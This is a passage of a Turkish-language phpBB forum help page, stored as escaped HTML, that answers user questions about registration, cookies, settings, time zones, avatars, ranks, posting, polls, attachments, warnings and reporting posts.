Birle\u015fik Devletlerin 13 ya\u015f\u0131ndan k\u00fc\u00e7\u00fck \u00e7ocuklar\u0131n bilgi toplamak i\u00e7in ailelerinden yaz\u0131l\u0131 izin almalar\u0131n\u0131 gerektiren bir kanun ya da yasal varislerin bilgilendirilmesi ve 13 ya\u015f\u0131ndan k\u00fc\u00e7\u00fcklerin ki\u015fisel bilgilerinin toplanmas\u0131na izin vermesi metodudur. E\u011fer kay\u0131t esnas\u0131nda bu durumun size uydu\u011fundan emin de\u011filseniz yard\u0131m i\u00e7in yasal dan\u0131\u015fman\u0131n\u0131za ba\u015fvurabilirsiniz. Unutmay\u0131n ki; phpBB size yasal \u00f6neriler sa\u011flayamaz ve kay\u0131t anla\u015fmas\u0131ndaki kurallar d\u0131\u015f\u0131nda herhangi bir yasal ba\u011flant\u0131 noktas\u0131 belirtemez.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r8\"></a><b>&#187; Neden kay\u0131t olam\u0131yorum?</b></div>\n\t\t\t\t<div class=\"postbody\">Pano y\u00f6neticisi IP adresinizi yasaklam\u0131\u015f olabilir veya kullan\u0131c\u0131 ad\u0131n\u0131z izinli olmayabilir. Yeni ziyaret\u00e7i kayd\u0131 al\u0131m\u0131 da engellemi\u015f olabilir. Yard\u0131m i\u00e7in pano y\u00f6neticisine ba\u015fvurabilirisniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r9\"></a><b>&#187; \u201cT\u00fcm pano \u00e7erezlerini sil\u201d ne yapar?</b></div>\n\t\t\t\t<div class=\"postbody\">\u201cT\u00fcm pano \u00e7erezlerini sil\u201d panoya ba\u011fl\u0131 kalman\u0131z\u0131 sa\u011flamak i\u00e7in phpBB3 taraf\u0131ndan olu\u015fturulan b\u00fct\u00fcn \u00e7erezleri siler, ve ayn\u0131 zamanda e\u011fer pano y\u00f6neticisi ayarlam\u0131\u015fsa izlerin okunmas\u0131 gibi fonksiyonlar sa\u011flar. E\u011fer oturum a\u00e7ma esnas\u0131nda sorun ya\u015f\u0131yorsan\u0131z, b\u00fct\u00fcn pano \u00e7erezlerini silmeniz sorununuzun \u00e7\u00f6z\u00fcm\u00fcne yard\u0131mc\u0131 olabilir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Kullan\u0131c\u0131 Tercihleri ve Ayarlar\u0131</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r0\"></a><b>&#187; Ayarlar\u0131m\u0131 nas\u0131l de\u011fi\u015ftirebilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">E\u011fer kay\u0131tl\u0131ysan\u0131z b\u00fct\u00fcn ayarlar\u0131n\u0131z veri taban\u0131nda tutulur. Ayarlar\u0131n\u0131z\u0131 de\u011fi\u015ftirmek i\u00e7in, Kullan\u0131c\u0131 Kontrol Panelinize girin; pano sayfalar\u0131n\u0131n hepsinin \u00fcst k\u0131sm\u0131nda bulunan bir ba\u011flat\u0131d\u0131r. Bu sistem b\u00fct\u00fcn tercih ve ayarlar\u0131n\u0131z\u0131 de\u011fi\u015ftirmenizi sa\u011flayacakt\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r1\"></a><b>&#187; Zamanlar do\u011fru de\u011fil!</b></div>\n\t\t\t\t<div class=\"postbody\">Panonun zaman dilimi sizinkinden farkl\u0131 olabilir. E\u011fer durumunuz buna uyuyorsa kullan\u0131c\u0131 panelinize gidin, hesab\u0131n\u0131zdaki zaman dilimini Londra, Paris, New York, Sidney gibi \u00f6zel bir alanla de\u011fi\u015ftirin. Unutmay\u0131n ki zaman dilimini de\u011fi\u015ftirmeniz di\u011fer ayarlarda oldu\u011fu gibi kay\u0131tl\u0131 \u00fcye olman\u0131za ba\u011fl\u0131d\u0131r. E\u011fer kay\u0131tl\u0131 \u00fcye de\u011filseniz bu kaydolmak iyi bir zaman olabilir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r2\"></a><b>&#187; Zaman dilimini de\u011fi\u015ftirmeme ra\u011fmen zaman hala yanl\u0131\u015f!</b></div>\n\t\t\t\t<div class=\"postbody\">E\u011fer zaman dilimi ve Yaz Saati uygulamas\u0131n\u0131 (DST) do\u011fru yapt\u0131\u011f\u0131n\u0131zdan eminseniz ve zaman hala yanl\u0131\u015fsa, bunun sebebi sunucu saat\u0131n\u0131n yanl\u0131\u015f olmas\u0131d\u0131r. L\u00fctfen, y\u00f6neticiyi problemin d\u00fczeltilmesi i\u00e7in durumdan haberdar edin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r3\"></a><b>&#187; Listede benim dilim mevcut de\u011fil!</b></div>\n\t\t\t\t<div class=\"postbody\">Bunun muhtemel sebepleri y\u00f6neticinin sizin dilinizi y\u00fcklememi\u015f olmas\u0131 ya da kimsenin bu pononun sizin dilinize hen\u00fcz terc\u00fcmesini yapmam\u0131\u015f olmas\u0131 olabilir. L\u00fctfen, y\u00f6neticiye sizin dilinizin y\u00fckl\u00fc olup olmad\u0131\u011f\u0131n\u0131 sorun. E\u011fer dil paketi yoksa terc\u00fcme yapma \u00f6zg\u00fcrl\u00fc\u011f\u00fcn\u00fcz vard\u0131r. Daha fazla bilgi i\u00e7in phpBB Grubunun web sitesini ziyaret edebilirisiniz (sayfa alt\u0131ndaki ba\u011flant\u0131ya bak\u0131n\u0131z).</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r4\"></a><b>&#187; Kullan\u0131c\u0131 ad\u0131m\u0131n alt\u0131nda nas\u0131l resim g\u00f6sterebilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">\u0130letilere bakarken kullan\u0131c\u0131 ad\u0131n\u0131z\u0131n alt\u0131nda iki resim olabilir. Kullan\u0131lan stile ba\u011f\u0131l\u0131 olarak, birinci resim sizin seviyeniz ile ilgilidir, genel olarak y\u0131ld\u0131zlardan ya da sizin ne kadar ileti g\u00f6nderdi\u011finizi ya da forumdaki stat\u00fcn\u00fcz\u00fc g\u00f6steren bir blok olabilir. A\u015fa\u011f\u0131s\u0131nda avatar diye bilinen daha geni\u015f bir resim olabilir, bu genel olarak kullan\u0131c\u0131ya \u00f6zeldir. Avatar kullan\u0131m\u0131n\u0131 aktif hale getirmek pano y\u00f6neticisine ba\u011fl\u0131d\u0131r ve nas\u0131l bir avatar\u0131n g\u00f6sterilebilece\u011fi konusunda se\u00e7im yapma hakk\u0131na sahiptirler. E\u011fer avatar kullanam\u0131yorsan\u0131z bu pano y\u00f6neticisinin karar\u0131d\u0131r, bu durumun sebebini y\u00f6neticilere sorabilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r5\"></a><b>&#187; Seviye nedir ve nas\u0131l de\u011fi\u015ftirebilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">Seviye, kullan\u0131c\u0131 ad\u0131n\u0131z\u0131n alt\u0131nda g\u00f6r\u00fcn\u00fcr ve g\u00f6nderdi\u011finiz ileti say\u0131s\u0131n\u0131 g\u00f6sterir ya da yetkili ve y\u00f6netici gibi belli kullan\u0131c\u0131lar\u0131 belli eder. Genel olarak seviyenizi do\u011frudan de\u011fi\u015ftiremezsiniz \u00e7\u00fcnk\u00fc; bu seviyelerin y\u00f6netimi pano y\u00f6neticisine aittir. L\u00fctfen, sadece ileti say\u0131n\u0131z\u0131 artt\u0131rmak i\u00e7in panoyu amac\u0131 d\u0131\u015f\u0131nda kullanmay\u0131n, muhtemelen yetkili ya da y\u00f6neticiler taraf\u0131ndan bu iletiler bulunacak ve iletileriniz silinerek basit bir \u015fekilde seviyeniz d\u00fc\u015f\u00fcr\u00fclecektir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f1r6\"></a><b>&#187; \u00dcyeye e-posta g\u00f6nder butonuna bas\u0131nca neden oturum a\u00e7mam isteniyor?</b></div>\n\t\t\t\t<div class=\"postbody\">Sadece kay\u0131tl\u0131 kullan\u0131c\u0131lar (mesaj panosu y\u00f6neticisinin izin vermesi durumunda) e-posta g\u00f6nderebilir. Bunun amac\u0131 e-posta hizmetinin kay\u0131t olmayan kullan\u0131clar\u0131n olumsuz kullan\u0131mlar\u0131n\u0131 engellemektir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>G\u00f6nderim Konular\u0131</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r0\"></a><b>&#187; Bir forumda nas\u0131l ba\u015fl\u0131k a\u00e7abilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">Forumlar\u0131n birinde yeni konu a\u00e7mak i\u00e7in forumun \u00fcst\u00fcndeki ya da ileti sayfas\u0131ndaki ilgili butonu t\u0131klay\u0131n. Bir ileti g\u00f6ndermeden \u00f6nce kay\u0131t olman\u0131z gerekebilir, sizin i\u00e7in kullan\u0131labilir olan \u00f6zellikler panonun alt k\u0131sm\u0131nda ve ba\u015fl\u0131k ekran\u0131nda listelenmi\u015ftir. \u00d6rne\u011fin: Yeni ba\u015fl\u0131k a\u00e7abilirsiniz, Anketlerde oy kullanabilirsiniz, gibi</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r1\"></a><b>&#187; Bir iletiyi nas\u0131l de\u011fi\u015ftirebilir veya silerim?</b></div>\n\t\t\t\t<div class=\"postbody\">E\u011fer y\u00f6netici ya da yetkili de\u011filseniz sadece kendi iletinizde de\u011fi\u015fiklik ya da silme i\u015flemi yapabilirsiniz. Bir iletiyi o ileti ile ilgili d\u00fczenleme butonunu t\u0131klayarak de\u011fi\u015ftirebilirsiniz, bazen bu i\u015flem i\u00e7in bir zaman k\u0131s\u0131tlamas\u0131 konulabilir.E\u011fer siz ileti yazd\u0131ktan sonra ba\u015fka biri ileti g\u00f6ndermi\u015fse de\u011fi\u015ftirme ekran\u0131ndan ileti g\u00f6sterim ekran\u0131na d\u00f6nd\u00fc\u011f\u00fcn\u00fcz zaman iletinizin alt\u0131nda k\u0131sa bir metin g\u00f6sterilecektir, bu metinde iletiyi ne zaman ve ka\u00e7 defa de\u011fi\u015ftirdi\u011finiz listelenecektir. Bu metin e\u011fer ba\u015fka biri ileti g\u00f6ndermemi\u015fse g\u00f6sterilmeyecektir, yetkili ya da y\u00f6neticiler taraf\u0131ndan yap\u0131lan de\u011fi\u015fiklikler de g\u00f6sterilmeyecektir. Bu durumda size d\u00fczenleme ile ilgili bir not yazmalar\u0131 yetkili ya da y\u00f6neticilerin kendi tercihine kalm\u0131\u015ft\u0131r. Unutmay\u0131n ki, normal kullan\u0131c\u0131lar kendi iletilerinden sonra ba\u015fka birinin ileti g\u00f6ndermesi durumunda iletilerini silemezler.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r2\"></a><b>&#187; \u0130letime imzam\u0131 nas\u0131l eklerim?</b></div>\n\t\t\t\t<div class=\"postbody\">\u0130letinize imza eklemek i\u00e7in \u00f6ncelikle Kullan\u0131c\u0131 Paneliniz arac\u0131l\u0131\u011f\u0131 ile bir imza olu\u015fturmal\u0131s\u0131n\u0131z. Ayn\u0131 zamanda uygun kontrol kutusunu i\u015faretlemek suretiyle varsay\u0131lan imza olarak b\u00fct\u00fcn iletilerinize ekleyebilirsiniz (iste\u011finiz dahilinde, imzan\u0131z\u0131n g\u00f6r\u00fcnmesini istemedi\u011finiz iletilerde \"imzam\u0131 g\u00f6ster\" kontrol kutusunu bo\u015f hale getirerek imzan\u0131z\u0131n sadece o ileti i\u00e7in g\u00f6sterilmemesini sa\u011flayabilirsiniz).</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r3\"></a><b>&#187; Nas\u0131l anket olu\u015ftururum?</b></div>\n\t\t\t\t<div class=\"postbody\">Yeni bir konu a\u00e7arken (ya da e\u011fer yetkiniz varsa bir ba\u015fl\u0131\u011f\u0131n ilk iletisini de\u011fi\u015ftirirken) ana g\u00f6nderim formunun alt\u0131nda \"Anket Olu\u015fturma\" sekmesini g\u00f6r\u00fcrs\u00fcn\u00fcz (e\u011fer g\u00f6r\u00fcyorsan\u0131z bu anket olu\u015fturmak i\u00e7in gerekli olan yetkilere sahip oldu\u011funuzu g\u00f6sterir). Anket olu\u015ftururken, \"Anket sorusu\" olarak bir ba\u015fl\u0131k girmelisiniz ve \"Anket se\u00e7ene\u011fi\" formuna en az bir adet se\u00e7enek girmelisiniz. Her se\u00e7ene\u011fin farkl\u0131 bir metin alan\u0131na yaz\u0131ld\u0131\u011f\u0131ndan emin olun. Ayn\u0131 zamanda kullan\u0131c\u0131lar\u0131n oylama esnas\u0131nda se\u00e7ecekleri se\u00e7enek say\u0131s\u0131n\u0131 da \u201cKullan\u0131c\u0131 ba\u015f\u0131na d\u00fc\u015fen se\u00e7enekler\u201d alt\u0131nda ayarlayabilir ve anket i\u00e7in bir s\u00fcre belirleyebilirsiniz (0 ile i\u015faretlediyseniz anket s\u00fcresiz olarak uygulan\u0131r) ve son se\u00e7enek olarak e\u011fer izin verilmi\u015fse \u00fcyeler oylar\u0131n\u0131 de\u011fi\u015ftirebilirler.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r4\"></a><b>&#187; Neden daha fazla anket se\u00e7ene\u011fi olu\u015fturam\u0131yorum?</b></div>\n\t\t\t\t<div class=\"postbody\">Anket se\u00e7enek say\u0131s\u0131 pano y\u00f6netici taraf\u0131ndan belirlenir. E\u011fer izin verilen say\u0131dan daha fazla anket se\u00e7ene\u011fi eklemeye ihtiyac\u0131n\u0131z varsa, pano y\u00f6neticisiyle irtibata ge\u00e7ebilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r5\"></a><b>&#187; Bir anketi nas\u0131l d\u00fczenleyebilir ya da silebilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">\u0130letilerle beraber, anketler de iletiyi g\u00f6nderen \u00fcye, yetkili ya da y\u00f6netici taraf\u0131ndan de\u011fi\u015ftirilebilir. Anketleri de\u011fi\u015ftirmek i\u00e7in ba\u015fl\u0131ktaki ilk iletiyi de\u011fi\u015ftirin (genelde bu ileti anketle ilgilidir). E\u011fer hi\u00e7 kimse oy kullanmam\u0131\u015fsa \u00fcyeler anketi silebilir ya da de\u011fi\u015ftirebilir. Ancak, e\u011fer oy kullan\u0131lm\u0131\u015fsa sadece yetkili ve y\u00f6neticiler silebilir. Bu uygulaman\u0131n amac\u0131, oylama s\u0131ras\u0131nda farkl\u0131 kimselerin se\u00e7enekleri de\u011fi\u015ftirerek oylaman\u0131n y\u00f6n\u00fcn\u00fc de\u011fi\u015ftirmesini engellemktir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r6\"></a><b>&#187; Baz\u0131 forumlara neden eri\u015femiyorum?</b></div>\n\t\t\t\t<div class=\"postbody\">Baz\u0131 forumlar belli kullan\u0131c\u0131 ya da gruplar\u0131n kullan\u0131m\u0131yla s\u0131n\u0131rland\u0131r\u0131labilir. G\u00f6rmek, okumak, ileti g\u00f6ndermek vb. i\u00e7in yetilendirilmeniz gerekebilir. Sadece yetkililer ve y\u00f6neticiler bu yetkilendirmeyi yapabilir, bu durumda ilgililerden biriyle ileti\u015fime ge\u00e7meniz gerekmektedir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r7\"></a><b>&#187; Neden eklenti y\u00fckleyemiyorum?</b></div>\n\t\t\t\t<div class=\"postbody\">Forum, grup ya da kullan\u0131c\u0131 izinlerine ba\u011fl\u0131 olarak eklenti ekleyebilirsiniz. Pano y\u00f6neticisi baz\u0131 forumlara eklenti y\u00fcklemenize izin vermi\u015f olabilir ya da sadece belli gruplar eklenti y\u00fckleyebiliyor olabilir. E\u011fer neden eklenti y\u00fckleyemedi\u011finizden emin de\u011filseniz mesaj panosu y\u00f6neticisiyle irtibata ge\u00e7ebilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r8\"></a><b>&#187; Neden bir uyar\u0131 ald\u0131m?</b></div>\n\t\t\t\t<div class=\"postbody\">Her pano y\u00f6neticisi siteleri i\u00e7in kendi kurallar\u0131n\u0131 uygulama hakk\u0131na sahiptir. E\u011fer kurallardan birini ihlal ettiyseniz, bu y\u00fczden uyar\u0131 alm\u0131\u015f olabilirsiniz. Unutmay\u0131n ki; bu site y\u00f6neticisinin karar\u0131d\u0131r ve phpBB Grubunun bu konuda yapabilece\u011fi bir \u015fey yoktur. L\u00fctfen emin olmak i\u00e7in mesaj panosu y\u00f6neticisiyle irtibata ge\u00e7in.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r9\"></a><b>&#187; \u0130letileri yetkililere nas\u0131l rapor ederim?</b></div>\n\t\t\t\t<div class=\"postbody\">E\u011fer pano y\u00f6neticisi izin vermi\u015fse, rapor etmek istedi\u011finiz iletiye gidin ve iletiyi rapor etmeyle ilgili olan butonu t\u0131klay\u0131n. Rapor etmek i\u00e7in gerekli olan i\u015flemleri yap\u0131n.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r10\"></a><b>&#187; Konu g\u00f6nderimindeki \u201cKaydet\u201d butonu ne i\u00e7in?</b></div>\n\t\t\t\t<div class=\"postbody\">Bu size daha sonraki zamanlarda iletinizi tamamlamak ya da onaylamak i\u00e7in iletinizi saklama \u015fans\u0131 tan\u0131r. Bu iletileri tekrar y\u00fcklemek i\u00e7in Kullan\u0131c\u0131 Paneline gidin ve gerekli i\u015flemleri tamamlay\u0131n.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r11\"></a><b>&#187; Neden iletimin onaylanmas\u0131 gerekiyor?</b></div>\n\t\t\t\t<div class=\"postbody\">Pano y\u00f6neticisi iletilerinizin \u00f6ncelikle kontrol edilmesi gerekti\u011fine karar verebilir. Y\u00f6netici sizi mesajlar\u0131 onaylanmadan \u00f6nce g\u00f6zden ge\u00e7irilmesi gereken \u00fcyelerden olu\u015fan bir gruba dahil etmi\u015f olabilir. Bu durumda ayr\u0131nt\u0131l\u0131 bilgi almak i\u00e7in y\u00f6neticiyle irtibata ge\u00e7melisiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f2r12\"></a><b>&#187; Konumu nas\u0131l g\u00fcncel tutabilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">G\u00f6rmekte oldu\u011funuz ileti sayfas\u0131ndaki \"Konuyu g\u00fcncel tut\" ba\u011flant\u0131s\u0131n\u0131 kullanarak ilgili konunuzu forum i\u00e7inde en \u00fcste getirebilirsiniz. E\u011fer bunu g\u00f6rm\u00fcyorsan\u0131z bu \u00f6zellik iptal edilmi\u015ftir. Ayn\u0131 zamanda, muhtemelen iletiye cevap yazarak da konunuzu forum i\u00e7inde en \u00fcste getirebilirsiniz. Yine de, ziyaret etti\u011finiz mesaj panosununun kurallar\u0131na bir g\u00f6z atabilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Bi\u00e7imlendirme ve Ba\u015fl\u0131k Tipleri</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f3r0\"></a><b>&#187; Bi\u00e7im kodu nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">Bi\u00e7im kodu (BBCode) \u00f6zel bir HTML uygulamas\u0131d\u0131r, y\u00f6netici taraf\u0131ndan belirlenen bi\u00e7im kodu 